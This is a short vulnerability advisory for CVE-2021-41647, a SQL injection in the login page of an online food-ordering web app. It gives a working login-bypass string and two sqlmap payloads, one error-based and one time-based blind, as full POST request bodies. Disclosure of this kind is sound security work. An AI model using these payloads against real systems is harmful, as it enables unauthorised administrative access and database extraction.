CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique. Link To Application Online-Food-Ordering-Web-App Affected Components & Parameter URL: /login.php PARAMETER: username POC'S LOGIN BYPASS PAYLOAD To bypass the user login and gain full administrative access, payload in the username input field: user' or 1=1-- - SQLMAP PAYLOADS Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf Discovered by Jason Colyvas MOBIUSBINARY September 20th, 2021